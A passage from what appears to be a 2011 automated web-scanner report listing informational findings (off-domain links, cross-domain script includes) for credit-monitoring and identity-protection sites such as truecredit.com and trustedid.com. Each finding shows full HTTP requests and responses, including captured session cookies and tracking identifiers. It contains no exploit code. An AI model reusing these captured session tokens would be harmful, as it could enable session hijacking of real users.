<a href="https://www.transunion.com/corporate/aboutUs/whoWeAre/companyStructure/transUnionInteractive.page?" name="https://www.transunion.com/corporate/aboutUs/whoWeAre/companyStructure/transUnionInteractive.page?" target="_blank" onclick="_gaq.push(['_link', 'https://www.transunion.com/corporate/aboutUs/whoWeAre/companyStructure/transUnionInteractive.page?']); return false;">about</a>
...[SNIP]...

23.605. https://www.truecredit.com/products/optimizedOrder.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.truecredit.com
Path:   /products/optimizedOrder.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /products/optimizedOrder.jsp?package=Free7DayTrialSingleCMU HTTP/1.1
Host: www.truecredit.com
Connection: keep-alive
Referer: http://www.truecredit.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TCID=1303674394504:2le; TLSESSIONID=1303691658482; TCVISIT=558554714-New-TrueCredit; JSESSIONID=d6eHw60bY1o7; op112homepagegum=a05w0i21zj274pm0341w7d5a3; op112homepageliid=a05w0i21zj274pm0341w7d5a3; __utmz=1.1303691678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2001284035.1303691678.1303691678.1303691678.1; __utmc=1; __utmb=1.1.10.1303691678; s_pers=%20s_nr%3D1303674501185%7C1306266501185%3B%20s_depth%3D1%7C1303693477019%3B%20s_vnum%3D1306266408564%2526vn%253D3%7C1306266408564%3B%20s_visit%3D1%7C1303693853489%3B%20dfa_cookie%3Dtuitruecredit%7C1303693853506%3B%20s_ev22%3D%255B%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674501180'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303678375845'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303678378941'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C'%252C'1303691677045'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C'%252C'1303692053529'%255D%255D%7C1461544853528%3B%20s_invisit%3Dtrue%7C1303693853537%3B%20s_lv%3D1303692053541%7C1398300053541%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1303693853541%3B%20s_pv%3Dtc%253Atc%253ALanding%2520Page%2520%253A%2520TrueCredit%2520Entry%7C1303693853547%3B; s_sess=%20s_cc%3Dtrue%3B%20ttc%3D1303691677051%3B%20s_ppv%3D100%3B%20SC_LINKS%3Dtc%253Atc%253ALanding%2520Page%2520%253A%2520TrueCredit%2520Entry%255E%255Ehttp%253A%252F%252Fpromo.truecredit.com%252FOptimost_Test%252FOptimost_TransUnion_Homepage_10-2010%252FG-ButtonColor%252Fbutton_G1.png%255E%255Etc%253Atc%253ALanding%2520Page%2520%253A%2520TrueCredit%2520Entry%2520%257C%2520http%253A%252F%252Fpromo.truecredit.com%252FOptimost_Test%252FOptimost_TransUnion_Homepage_10-2010%252FG-ButtonColor%252Fbutton_G1.png%255E%255E%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:30:04 GMT
Server: Apache
cache-control: no-cache,must-revalidate
pragma: no-cache
Expires: -1
Set-Cookie: TLSESSIONID=1303695004739
Set-Cookie: TCVISIT=558558858-New-TrueCredit; path=/
Set-Cookie: JSESSIONID=dEs-TS58-_K8; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 81382


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<link rel="shortcut icon" href="https://www.truecredit.com/Shortcut_Icon_TU.ico" type="image/x-icon">

<TITLE>Ch
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="https://fls.doubleclick.net/activityi;src=1881123;type=truec487;cat=trans835;ord=12F8A47147007A;num=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<noscript>
<iframe src="https://fls.doubleclick.net/activityi;src=2769103;type=tui-t329;cat=truec284;ord=12F8A47147007A;num=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</a>&nbsp;|


<a href="https://www.transunion.com/corporate/aboutUs/whoWeAre/companyStructure/transUnionInteractive.page?" name="https://www.transunion.com/corporate/aboutUs/whoWeAre/companyStructure/transUnionInteractive.page?" target="_blank" onclick="_gaq.push(['_link', 'https://www.transunion.com/corporate/aboutUs/whoWeAre/companyStructure/transUnionInteractive.page?']); return false;">about</a>
...[SNIP]...
</body>


<script language="javascript" src="https://www.upsellit.com/upsellitJS4.jsp?siteID=2723&qs=254271203240331329344340313313344321295289275341328340277313&trackingInfo=https%3A%2F%2Fwww.truecredit.com%2Fproducts%2Fupsellit%2Forder.jsp%3FversionID%3D0%26package%3DFree7DayTrialTriBureauCMU_TUTrial%26formName%3DfreeSingleCMUChoice%26trackPixel%3Dupsellit%26loc%3D2370"></script>
...[SNIP]...

23.606. https://www.truecredit.com/products/order2.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.truecredit.com
Path:   /products/order2.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /products/order2.jsp?package=TriBureauCMUStartupfee&cb=credit&formName=freeTriBureauCMUChoice&refid=20110324-174a3c150b7e7f3b565b HTTP/1.1
Host: www.truecredit.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 20:12:21 GMT
Server: Apache
Cache-Control: no-cache,must-revalidate
pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: TLSESSIONID=1303675941653
Set-Cookie: TCID=1303675941653:AM_; path=/; expires=Mon, 11-Apr-2061 20:12:21 GMT
Set-Cookie: JSESSIONID=if_ae8AEJAM_; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 12840


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<link rel="shortcut icon" href="https://www.truecredit.com/Shortcut_Icon_TU.ico" type="image/x-icon">

<TITLE>Onl
...[SNIP]...
<td width="354" valign="middle"><a href="https://www.Credit.com" ><img src="/Cob/credit/images/custom_header_en.jpg" height="60" width="350" border="0" alt="" />
...[SNIP]...
</a>&nbsp;|


<a href="https://www.transunion.com/corporate/aboutUs/whoWeAre/companyStructure/transUnionInteractive.page?" name="https://www.transunion.com/corporate/aboutUs/whoWeAre/companyStructure/transUnionInteractive.page?" target="_blank" onclick="_gaq.push(['_link', 'https://www.transunion.com/corporate/aboutUs/whoWeAre/companyStructure/transUnionInteractive.page?']); return false;">about</a>
...[SNIP]...

23.607. https://www.truecredit.com/user/returnUser.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.truecredit.com
Path:   /user/returnUser.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /user/returnUser.jsp?cb=credit HTTP/1.1
Host: www.truecredit.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TCID=1303674394504:2le; JSESSIONID=afd8RC5un2le; s_pers=%20s_vnum%3D1306266408564%2526vn%253D1%7C1306266408564%3B%20s_visit%3D1%7C1303676298592%3B%20s_depth%3D3%7C1303676298595%3B%20dfa_cookie%3Dtuitruecredit%7C1303676298598%3B%20s_ev22%3D%255B%255B'%25257C%25257C%25257C%25257CTriBureauCMUStartupfee%25257Ccredit%25257C20110324-174a3c150b7e7f3b565b%25257C%25257C%25257C%25257C'%252C'1303674408560'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674496699'%255D%252C%255B'%25257C%25257C%25257C%25257CTriBureauCMUStartupfee%25257Ccredit%25257C20110324-174a3c150b7e7f3b565b%25257C%25257C%25257C%25257C'%252C'1303674496801'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674498602'%255D%255D%7C1461527298602%3B%20s_nr%3D1303674498608%7C1306266498608%3B%20s_invisit%3Dtrue%7C1303676298611%3B%20s_lv%3D1303674498614%7C1398282498614%3B%20s_lv_s%3DFirst%2520Visit%7C1303676298614%3B%20s_pv%3Dtc%253ALogin%2520%253A%2520Return%2520User%2520Login%7C1303676298619%3B; s_sess=%20s_cc%3Dtrue%3B%20ttc%3D1303674498606%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D100%3B

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:48:08 GMT
Server: Apache
cache-control: no-cache,must-revalidate
pragma: no-cache
Expires: -1
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 34305


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<link rel="shortcut icon" href="https://www.truecredit.com/Shortcut_Icon_TU.ico" type="image/x-icon">

<TITLE>Onli
...[SNIP]...
<noscript>
<iframe src="https://fls.doubleclick.net/activityi;src=2769103;type=tui-t329;cat=truec649;ord=1;num=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
<td width="354" valign="middle"><a href="https://www.Credit.com" ><img src="/Cob/credit/images/custom_header_en.jpg" height="60" width="350" border="0" alt="" />
...[SNIP]...
</a>&nbsp;|


<a href="https://www.transunion.com/corporate/aboutUs/whoWeAre/companyStructure/transUnionInteractive.page?" name="https://www.transunion.com/corporate/aboutUs/whoWeAre/companyStructure/transUnionInteractive.page?" target="_blank" onclick="_gaq.push(['_link', 'https://www.transunion.com/corporate/aboutUs/whoWeAre/companyStructure/transUnionInteractive.page?']); return false;">about</a>
...[SNIP]...
</table>


<img src="https://ad.yieldmanager.com/pixel?id=104248&t=2" width="1" height="1" />


<div id="tracking">
...[SNIP]...

23.608. https://www.trustedid.com/cmalp1.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /cmalp1.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cmalp1.php?promoRefCode=SEMGOOGCM14DF&gclid=CLTp5ZX1tagCFUSo4Aod61iHCA HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: promoRefCode=NXTIDF01IDEFT

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:23:36 GMT
Server: Apache
Set-Cookie: TIDT=173.193.214.243.1303676616385263; path=/; domain=.trustedid.com
Set-Cookie: TSI=n9aijp6kmv2idr7asjh3a48343; path=/; domain=www.trustedid.com; secure; HttpOnly
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: promoRefCode=SEMGOOGCM14DF; expires=Tue, 24-May-2011 20:23:36 GMT; path=/; domain=.trustedid.com; secure
Set-Cookie: refCode=deleted; expires=Sat, 24-Apr-2010 20:23:35 GMT; path=/; domain=.trustedid.com; secure
Set-Cookie: TSI=tsis0amhjkv950im9ira5ikvg6; path=/; domain=www.trustedid.com; secure; HttpOnly
Set-Cookie: promoRefCode=SEMGOOGCM14DF; expires=Tue, 24-May-2011 20:23:36 GMT; path=/; domain=.trustedid.com; secure
Last-Modified: Sun, 24 Apr 2011 20:23:36 GMT
Cache-Control: post-check=0, pre-check=0
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 20733

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html >
<head>

<title>TrustedID - America's Identity Theft Protection Company - Identity Theft P
...[SNIP]...
</script>

<script src="https://www.popularmedia.net/site/c1fd33e0-df89-012b-2f61-f000c17e07c1" type="text/javascript"></script>
...[SNIP]...
<div style="float: left; margin-left: 210px; margin-top: 5px; margin-right: 7px;">
<a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.TRUSTEDID.COM&lang=en" target="_new"><img src="/images/tid/logo_verisign.gif" alt="Verisign" title="Verisign">
...[SNIP]...
<div style="float: left; margin-top: 10px;">
<a href="https://www.scanalert.com/RatingVerify?ref=trustedid.com" target="_new" ><img border="0" src="//images.scanalert.com/meter/trustedid.com/13.gif" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;"></a>
...[SNIP]...
TrustedID, Inc., Identity Theft Protection & Prevention Services, Redwood City, CA" style="display: block; position: relative; overflow: hidden; width: 100px; height: 45px; margin: 0px; padding: 0px;"><img style="padding: 0px; border: none;" id="bbblinkimg" src="https://seal-goldengate.bbb.org/logo/ruhzbus/trustedid-76356.png" width="200" height="45" alt="TrustedID, Inc., Identity Theft Protection & Prevention Services, Redwood City, CA" /></a>
...[SNIP]...
<!-- GOOGLE ANALYTICS start -->
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"> </script>
...[SNIP]...
<!-- GOOGLE ANALYTICS end --><img src="https://secure.fastclick.net/w/tre?ad_id=20262;evt=12614;cat1=13674;cat2=13675" width="1" height="1" border="0"><iframe src="https://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=1867" scrolling="no" width="1" height="1" marginheight="0" marginwidth="0" frameborder="0"></iframe>
...[SNIP]...

23.609. https://www.trustedid.com/idfide01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /idfide01/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /idfide01/?promoCodeRefIde=NXTIDF01IDEFT&promoCodeRefIdf=NXTIDF01IDFFT15 HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:12:34 GMT
Server: Apache
Set-Cookie: TIDT=173.193.214.243.1303614754152763; path=/; domain=.trustedid.com
Set-Cookie: TSI=6rjj85kupb6n5r77pnlgtoq3g0; path=/; domain=www.trustedid.com; secure; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 10457

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Best-in-class Identity Protection</title>
<meta content="text/ht
...[SNIP]...
<div class="lp-footer-icons">
<a target="_new" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&amp;dn=WWW.TRUSTEDID.COM&amp;lang=en"><img title="Verisign" alt="Verisign" src="/images/tid/logo_verisign.gif"></a>
<a target="_new" href="https://www.scanalert.com/RatingVerify?ref=trustedid.com"><img border="0" oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." src="//images.scanalert.com/meter/trustedid.com/13.gif"></a>
...[SNIP]...

23.610. https://www.trustedid.com/registration.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /registration.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /registration.php?promoRefCode=NXTIDF01IDEFT HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
Referer: https://www.trustedid.com/idfide01/?promoCodeRefIde=NXTIDF01IDEFT&promoCodeRefIdf=NXTIDF01IDFFT15
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TIDT=173.193.214.243.1303614754152763; TSI=6rjj85kupb6n5r77pnlgtoq3g0; promoRefCode=NXDIRSUZIDPANN

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:50:27 GMT
Server: Apache
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: promoRefCode=NXTIDF01IDEFT; expires=Tue, 24-May-2011 03:50:27 GMT; path=/; domain=.trustedid.com; secure
Set-Cookie: refCode=deleted; expires=Sat, 24-Apr-2010 03:50:26 GMT; path=/; domain=.trustedid.com; secure
Set-Cookie: TSI=rad7gd7ho7s7nspvlonpj701d5; path=/; domain=www.trustedid.com; secure; HttpOnly
Set-Cookie: promoRefCode=NXTIDF01IDEFT; expires=Tue, 24-May-2011 03:50:27 GMT; path=/; domain=.trustedid.com; secure
Last-Modified: Sun, 24 Apr 2011 03:50:27 GMT
Cache-Control: post-check=0, pre-check=0
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 26670

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html >
<head>

<title>Identity Theft Protection Enrollment - TrustedID Registration</title>
<met
...[SNIP]...
<div style="float: left; margin-left: 210px; margin-top: 5px; margin-right: 7px;">
<a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.TRUSTEDID.COM&lang=en" target="_new"><img src="/images/tid/logo_verisign.gif" alt="Verisign" title="Verisign">
...[SNIP]...
<div style="float: left; margin-top: 10px;">
<a href="https://www.scanalert.com/RatingVerify?ref=trustedid.com" target="_new" ><img border="0" src="//images.scanalert.com/meter/trustedid.com/13.gif" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;"></a>
...[SNIP]...
TrustedID, Inc., Identity Theft Protection & Prevention Services, Redwood City, CA" style="display: block; position: relative; overflow: hidden; width: 100px; height: 45px; margin: 0px; padding: 0px;"><img style="padding: 0px; border: none;" id="bbblinkimg" src="https://seal-goldengate.bbb.org/logo/ruhzbus/trustedid-76356.png" width="200" height="45" alt="TrustedID, Inc., Identity Theft Protection & Prevention Services, Redwood City, CA" /></a>
...[SNIP]...
<!-- GOOGLE ANALYTICS start -->
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"> </script>
...[SNIP]...
<!-- GOOGLE ANALYTICS end --><img src="https://secure.fastclick.net/w/tre?ad_id=20262;evt=12614;cat1=13674;cat2=13675" width="1" height="1" border="0"><iframe src="https://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=1867" scrolling="no" width="1" height="1" marginheight="0" marginwidth="0" frameborder="0"></iframe>
...[SNIP]...

23.611. https://www.trustedid.com/suzeidprotector/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /suzeidprotector/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /suzeidprotector/?promoRefCode=NXDIRSUZIDPANN HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:12:19 GMT
Server: Apache
Set-Cookie: TIDT=173.193.214.243.1303614739643665; path=/; domain=.trustedid.com
Set-Cookie: TSI=lsgdamrpaddiv88ogrb60v3bq3; path=/; domain=www.trustedid.com; secure; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: promoRefCode=NXDIRSUZIDPANN; expires=Tue, 24-May-2011 03:12:19 GMT; path=/; domain=.trustedid.com; secure
Set-Cookie: refCode=deleted; expires=Sat, 24-Apr-2010 03:12:18 GMT; path=/; domain=.trustedid.com; secure
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 12420

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Identity Theft Protection from Suze Orman</title>
<meta content=
...[SNIP]...
<!-- GOOGLE ANALYTICS start -->
           <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"> </script>
...[SNIP]...
<div style="float: left; margin-top: 10px;">
<a target="_new" href="https://www.scanalert.com/RatingVerify?ref=trustedid.com"><img border="0" oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." src="//images.scanalert.com/meter/trustedid.com/13.gif"></a>
...[SNIP]...
<div style="float: left; margin-top: 5px; margin-right: 7px;">
<a target="_new" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&amp;dn=WWW.TRUSTEDID.COM&amp;lang=en"><img title="Verisign" alt="Verisign" src="/images/tid/logo_verisign.gif">
...[SNIP]...
e="TrustedID, Inc., Identity Theft Protection & Prevention Services, Redwood City, CA" style="display: block;position: relative;overflow: hidden; width: 40px; height: 72px; margin: 0px; padding: 0px;"><img style="padding: 0px; border: none;" id="bbblinkimg" src="https://seal-goldengate.bbb.org/logo/ruvtbus/trustedid-76356.png" width="80" height="72" alt="TrustedID, Inc., Identity Theft Protection & Prevention Services, Redwood City, CA" /></a>
...[SNIP]...

23.612. http://www.upsellit.com/upsellitJS4.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.upsellit.com
Path:   /upsellitJS4.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /upsellitJS4.jsp?qs=237274223205335307291298312323312298291312293277335341334322&siteID=5512&trackingInfo=http%3A//roia.biz/im/n/sf7Xvq1BAAGSLEMAAAVwQgAAnOhmMQA-A/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.upsellit.com
Cookie: JSESSIONID=1EC8C516AE02DCD23C181811D7D9B8F8; uid=CgoKBU20gu++zjv3FP/AAg==

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 20:25:40 GMT
Content-Type: text/html
Connection: keep-alive
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 16772

var USItimerID = '';
var properClickThrough = false;
var USIdone = false;
var USI_suppress = false;
if (typeof(noChatPlease) != "undefined") {
   if (noChatPlease) {
   properClickThrough = true; US
...[SNIP]...
<br/><a href="http://roia.biz/im/n/sf7Xvq1BAAGSLEMAAAVwQgAAnOhmMQA-A/">CLICK HERE</a>
...[SNIP]...
</div>';
}
function USI_includeFlash() {
   if (hasFlash) {
       
       document.getElementById('USIflashContentDiv').innerHTML = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="574" height="355" id="upsellitChat" align="middle"><param name="allowScriptAccess" value="always" />
...[SNIP]...

24. Cross-domain script include  previous  next
There are 293 instances of this issue:


24.1. http://ad-emea.doubleclick.net/adi/N5295.150290.INVITEMEDIA.COM/B5186974.4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5295.150290.INVITEMEDIA.COM/B5186974.4

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N5295.150290.INVITEMEDIA.COM/B5186974.4;sz=728x90;u=xbAGfINSJQJfsPowBk61VJFCxPLNndhfkuRy1CihyB3qJ4Q492Ptbr5RqmD9uaZTl_Y_7FpMEqqTPjwT77j4BOQSw_Z6u9lJ4okA;ord=[timestamp]? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676405&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658405706&bpp=2&shv=r20110420&jsv=r20110415&correlator=1303658405710&frm=1&adk=513358139&ga_vid=151306687.1303658406&ga_sid=1303658406&ga_hid=1762151746&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&eid=33895132&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 24 Apr 2011 15:20:04 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 7658

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 18 09:14:29 EST 2011 -->
<script src="http://s1.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

24.2. http://ad-emea.doubleclick.net/adi/N5295.150290.INVITEMEDIA.COM/B5186974.5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5295.150290.INVITEMEDIA.COM/B5186974.5

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N5295.150290.INVITEMEDIA.COM/B5186974.5;sz=160x600;u=xbAGfINSK1OZWyHfmPFFZjnYQ6_JEp6H70AsIgNy-WZB8vSB27OKaPWUYao00pJ4lGiHB7cajRTGDbuikyptjy1We14lklZG7rSQ;ord=[timestamp]? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
